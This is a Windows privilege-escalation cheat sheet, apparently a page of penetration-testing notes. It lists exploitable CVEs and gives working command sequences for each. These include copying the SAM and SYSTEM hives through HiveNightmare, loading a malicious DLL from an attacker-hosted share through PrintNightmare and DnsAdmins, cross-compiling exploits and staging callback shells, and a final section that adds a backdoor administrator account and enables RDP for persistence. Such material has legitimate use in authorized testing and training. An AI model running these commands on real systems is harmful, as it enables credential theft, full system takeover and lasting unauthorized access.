PrivEsc - Kernel & Exploits

Sections PrivEsc - Kernel & Exploits

Last resort on Windows, same rule as Linux: try W03-W07 first. Kernel exploits can BSOD a box.

i. Get the patch state 

systeminfo > si.txt
type si.txt | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
type si.txt | findstr /N "KB"

Note: systeminfo lists installed hotfixes. Missing patches = exploit candidates.

PowerShell:

Get-HotFix | Sort-Object -Descending InstalledOn | Select-Object HotFixID,InstalledOn -First 30

ii. Run a suggester

wesng (Windows-Exploit-Suggester-NG, the modern one):

## On attacker:
pip install wesng
wes --update
wes /tmp/si.txt -o report.txt
## Filter only Elevation of Privilege:
wes /tmp/si.txt --impact 'Elevation of Privilege' -o eop.txt

Old Windows-Exploit-Suggester (still useful for legacy):

windows-exploit-suggester.py --database 2024-*.xls --systeminfo si.txt

Read the suggester output by exploit availability and reliability. The high-confidence ones with public PoC are what you try.

iii. The big-name Windows privesc exploits

CVENameAffectsNotes
CVE-2021-36934HiveNightmare / SeriousSAMWin10 1809 - Win11 (until July 2021)Non-admin reads SAM via VSS. Very reliable.
CVE-2021-34527, 1675PrintNightmareAll Windows with Spooler enabledRemote and local variants, public PoC.
CVE-2021-1732Win32k privescWin10 1909+Public PoC, used in the wild.
CVE-2020-0796SMBGhostWin10 1903, 1909LPE and RCE variants.
CVE-2020-1054Win32k EOPWin10, Server 2019Public PoC.
CVE-2020-0668Modules InstallerMany Win10Symbolic-link race.
CVE-2019-1388UAC Certificate DialogWin7, Server 2008Click “Show certificate” -> SYSTEM.
CVE-2019-0708BlueKeepWin7, 2008, 2008 R2 RDPPre-auth RCE.
CVE-2018-8120Win32k EOPWin7, 2008 R2Reliable public PoC.
CVE-2017-0213COM Aggregate MarshalerManyReliable, runs as SYSTEM.
CVE-2017-0143 etcEternalBlue / MS17-010Win7, 2008 R2 SMBv1Famous. RCE -> SYSTEM.
CVE-2016-3309Win32k EOPWin7, 2008-2012 R2Public PoC.
CVE-2014-4113TrackPopupMenuWin7-2012Old but legendary.

iv. HiveNightmare (CVE-2021-36934)

The most reliable modern Windows EOP, no admin needed:

icacls C:\Windows\System32\config\SAM
## "BUILTIN\Users:(I)(RX)" means vulnerable

Read SAM/SYSTEM/SECURITY from a Volume Shadow Copy:

mklink /D C:\Temp\vss \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
copy C:\Temp\vss\Windows\System32\config\SAM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SYSTEM C:\Windows\Temp\
copy C:\Temp\vss\Windows\System32\config\SECURITY C:\Windows\Temp\

Or use the public PoC: HiveNightmare.exe from GitHub. Then parse on attacker with impacket-secretsdump LOCAL. See PrivEsc - Credentials & Files .

v. PrintNightmare (CVE-2021-34527, CVE-2021-1675)

Spooler abuse, two variants:

  • Local: any user adds a driver as SYSTEM
  • Remote: authenticated user on any host adds driver to a DC

Local privesc:

## Public PoC: SharpPrintNightmare.exe or CVE-2021-1675.py
## Build a malicious DLL that spawns SYSTEM shell, then:
SharpPrintNightmare.exe C:\Windows\Temp\evil.dll

Remote against a DC (from any domain user):

impacket-rpcdump 'corp.local'/'user':'pass'@10.10.11.50 | grep MS-PAR
## then:
python3 CVE-2021-1675.py corp.local/user:pass@10.10.11.50 '\\10.10.14.1\share\evil.dll'

vi. CVE-2019-1388 (Win7/2008)

UAC dialog certificate trick, requires you to be logged into the console (RDP works):

## During UAC prompt, click "Show information about this publisher's certificate"
## In the cert dialog, click on a URL link
## Browser opens as SYSTEM
## Save As -> navigate -> open cmd.exe as SYSTEM

vii. PoC sources

Build your own from the original PoC. These repos cover most CVEs above:

For modern boxes, search GitHub for CVE-YYYY-XXXXX PoC directly. Quality varies.

viii. Compilation cheatsheet

PoC is C/C++ source, no compiler on target. Cross-compile on attacker:

## 64-bit Windows
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32 -static
## 32-bit Windows
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32 -static

For .NET / C# PoCs, build on Windows attacker box or use Visual Studio Online.

ix. Pre-flight before kernel exploit

Same as Linux PrivEsc - Kernel & Exploits :

  • Confirm OS build + arch with systeminfo
  • Match exploit’s supported build exactly
  • Test on a snapshot if you have one
  • Have a callback ready, kernel exploits often kill the shell after firing
## Tell the exploit where to drop the shell, or compile your callback in
## If exploit needs an EXE to run as SYSTEM, point at a meterpreter or nc:
exploit.exe C:\Windows\Temp\sh.exe

x. When kernel exploits fail

  • Wrong build / patch level -> recheck systeminfo
  • Defender / EDR catches the binary -> see Defender & AMSI Evasion
  • Exploit BSOD’s the box -> different exploit
  • Exploit works once, then fails on retry -> some patch was applied between attempts
  • Userland triggers but no SYSTEM shell -> check if the binary you specified is signed/blocked

xi. Non-kernel “kernel-ish” tricks

These aren’t kernel but they hit modern Windows:

DnsAdmins DLL loading (member of DnsAdmins group):

dnscmd.exe /config /serverlevelplugindll \\10.10.14.1\share\evil.dll
sc.exe stop dns & sc.exe start dns

Backup Operators -> SAM (any non-admin in this group): See PrivEsc - Tokens & Privileges -> SeBackup.

Server Operators -> service binary: Members can modify service config -> instant SYSTEM via service binary swap, see PrivEsc - Services & Registry .

Storage Replica Administrators / Hyper-V Admins: less direct but powerful, look up specific abuses per role.

xii. After kernel privesc, persist

Same as Linux. Lock in a stable SYSTEM access before doing anything destructive:

## Add a local admin you control
net user backdoor 'Passw0rd!' /add
net localgroup Administrators backdoor /add
## Enable RDP if it isn't
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

See Persistence & Cleanup for the cleanup pass.